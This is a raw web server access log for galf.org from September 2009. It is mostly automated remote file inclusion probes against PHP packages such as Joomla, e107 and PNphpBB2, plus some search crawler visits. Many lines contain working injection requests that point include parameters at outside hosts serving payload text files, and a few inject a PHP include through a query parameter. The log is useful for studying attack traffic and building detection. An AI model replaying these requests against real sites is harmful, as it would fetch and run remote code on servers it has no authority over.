121.78.116.209 - - [21/Sep/2009:01:06:36 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.78.116.209 - - [21/Sep/2009:01:06:37 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.115.154 - - [21/Sep/2009:01:07:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.137 - - [21/Sep/2009:01:11:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.193 - - [21/Sep/2009:01:20:14 -0700] "GET /cendoc/?M=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.183 - - [21/Sep/2009:01:22:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.183 - - [21/Sep/2009:01:22:59 -0700] "GET /labia/?S=A HTTP/1.1" 200 524 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
94.23.2.21 - - [21/Sep/2009:01:24:23 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [21/Sep/2009:01:24:23 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
94.23.2.21 - - [21/Sep/2009:01:24:23 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
63.249.159.4 - - [21/Sep/2009:01:26:49 -0700] "GET /logs/e107/e107_handlers/secure_img_render.php?p=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:01:26:49 -0700] "GET /logs/access_090518.log%20/e107/e107_handlers/secure_img_render.php?p=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:01:26:49 -0700] "GET /e107/e107_handlers/secure_img_render.php?p=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
65.55.106.137 - - [21/Sep/2009:01:28:40 -0700] "GET /labia/?N=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:01:51:19 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:01:51:19 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:01:51:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [21/Sep/2009:01:51:51 -0700] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:01:51:54 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:01:51:54 -0700] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:01:51:54 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:00 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:00 -0700] "GET /logs/access.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:00 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:12 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:12 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:12 -0700] "GET /logs/access_090420.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:12 -0700] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:12 -0700] "GET /styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [21/Sep/2009:01:52:12 -0700] "GET /logs/access_090420.log%20%20//styles/internal/header.php?tpl_pgb_moddir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:01:56:16 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:01:56:38 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:01:56:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:01:56:40 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:01:57:44 -0700] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:01:59:17 -0700] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:01:59:17 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:01:59:17 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
209.97.212.185 - - [21/Sep/2009:02:00:10 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
209.97.212.185 - - [21/Sep/2009:02:00:10 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
209.97.212.185 - - [21/Sep/2009:02:00:11 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://montaguekorea.com/upload/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:02:03:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:02:03:40 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.40.68.132 - - [21/Sep/2009:02:03:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.39.182.49 - - [21/Sep/2009:02:08:24 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:02:08:25 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:02:08:25 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.55.106.210 - - [21/Sep/2009:02:09:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.210 - - [21/Sep/2009:02:10:39 -0700] "GET /cendoc/?N=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.39.130.23 - - [21/Sep/2009:02:16:19 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.39.130.23 - - [21/Sep/2009:02:16:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.39.130.23 - - [21/Sep/2009:02:16:20 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.236.47.182 - - [21/Sep/2009:02:19:48 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:19:48 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:19:48 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:19:57 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:19:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:19:57 -0700] "GET /logs/access_090330.log/joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:21:50 -0700] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.182 - - [21/Sep/2009:02:21:56 -0700] "GET /logs/access_090720.log/joomla/index.php?option=com_restaurante&task=http://www.ctseng.co.kr/bbs//icon/private_icon/private/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:02:31:18 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:02:31:18 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.228.220.59 - - [21/Sep/2009:02:31:18 -0700] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://ipts.co.kr/bbs/upload/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.8.115 - - [21/Sep/2009:02:32:22 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:02:42:20 -0700] "GET /logs/access_090518.log%20//index.php?visualizar=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:02:42:20 -0700] "GET /logs//index.php?visualizar=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
63.249.159.4 - - [21/Sep/2009:02:42:20 -0700] "GET /index.php?visualizar=http://nyobe.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
213.171.225.234 - - [21/Sep/2009:02:42:35 -0700] "GET /serendipity_xmlrpc.php HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.171.225.234 - - [21/Sep/2009:02:42:39 -0700] "GET /logs/serendipity_xmlrpc.php HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.182.225.143 - - [21/Sep/2009:02:57:03 -0700] "GET /logs/access_090316.log//?mosConfig_absolute_path=http://www.girdledepot.com/components/com_virtuemart/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.182.225.143 - - [21/Sep/2009:02:57:04 -0700] "GET /?mosConfig_absolute_path=http://www.girdledepot.com/components/com_virtuemart/idoisir.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
200.182.225.143 - - [21/Sep/2009:02:57:04 -0700] "GET /logs//?mosConfig_absolute_path=http://www.girdledepot.com/components/com_virtuemart/idoisir.txt??? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:02:57:33 -0700] "GET /logs/access_090316.log//?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:02:57:33 -0700] "GET /?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt????? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:02:57:33 -0700] "GET /logs//?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt????? HTTP/1.1" 200 4804 "-" "libwww-perl/5.79" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:02:57:40 -0700] "GET /logs/access_090316.log//?mosConfig_absolute_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:02:57:40 -0700] "GET /logs//?mosConfig_absolute_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 200 4804 "-" "libwww-perl/5.79" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:02:57:40 -0700] "GET /?mosConfig_absolute_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
200.182.225.143 - - [21/Sep/2009:03:00:25 -0700] "GET /logs/access_090316.log%20%20//?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.182.225.143 - - [21/Sep/2009:03:00:25 -0700] "GET /?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.182.225.143 - - [21/Sep/2009:03:00:25 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt????? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
200.182.225.143 - - [21/Sep/2009:03:02:10 -0700] "GET /logs/access_090316.log//?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/fxid.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:03:14:20 -0700] "GET /logs/access_090720.log/index.php?redir=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:03:14:20 -0700] "GET /logs/index.php?redir=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:03:14:20 -0700] "GET /index.php?redir=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:03:14:21 -0700] "GET /logs/access_090406.log/index.php?redir=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:03:18:34 -0700] "GET /logs/access_090720.log%20/index.php?redir=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
91.149.157.136 - - [21/Sep/2009:03:18:45 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
91.149.157.136 - - [21/Sep/2009:03:18:45 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
91.149.157.136 - - [21/Sep/2009:03:18:45 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sydneyfreeskate.com/forum//idv66ok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
121.78.116.209 - - [21/Sep/2009:03:22:19 -0700] "GET /logs/access.log/home.php?pagina=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:03:22:19 -0700] "GET /home.php?pagina=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:03:22:19 -0700] "GET /logs/home.php?pagina=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:03:22:44 -0700] "GET /home.php?pagina=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:03:22:44 -0700] "GET /logs/home.php?pagina=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.78.116.209 - - [21/Sep/2009:03:22:44 -0700] "GET /logs/access.log%20%20/home.php?pagina=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.39.182.49 - - [21/Sep/2009:03:26:20 -0700] "GET /http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:27:27 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:27:27 -0700] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:27:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:03:28:07 -0700] "GET /logs/access_090817.log/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:03:28:07 -0700] "GET /http://h1.ripway.com/zreg/idx? HTTP/1.0" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:03:28:08 -0700] "GET /logs/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [21/Sep/2009:03:28:17 -0700] "GET /logs/access_090824.log/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
211.239.157.203 - - [21/Sep/2009:03:33:42 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.239.157.203 - - [21/Sep/2009:03:33:42 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.239.157.203 - - [21/Sep/2009:03:33:42 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.4pppp.com/icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:36:49 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:36:49 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:36:49 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [21/Sep/2009:03:37:04 -0700] "GET /logs/access_090511.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.192.131.74 - - [21/Sep/2009:03:37:09 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.192.131.74 - - [21/Sep/2009:03:37:09 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.192.131.74 - - [21/Sep/2009:03:37:09 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/rfi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.192.131.74 - - [21/Sep/2009:03:37:12 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.192.131.74 - - [21/Sep/2009:03:37:12 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.192.131.74 - - [21/Sep/2009:03:37:12 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://newenglandclubcleaners.com//ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.182.225.143 - - [21/Sep/2009:03:38:34 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.girdledepot.com/components/com_virtuemart/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.182.225.143 - - [21/Sep/2009:03:38:34 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.girdledepot.com/components/com_virtuemart/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.182.225.143 - - [21/Sep/2009:03:38:34 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.girdledepot.com/components/com_virtuemart/idoisir.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.207.172.166 - - [21/Sep/2009:03:38:58 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.207.172.166 - - [21/Sep/2009:03:38:58 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://h1.ripway.com/Oluhuta/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
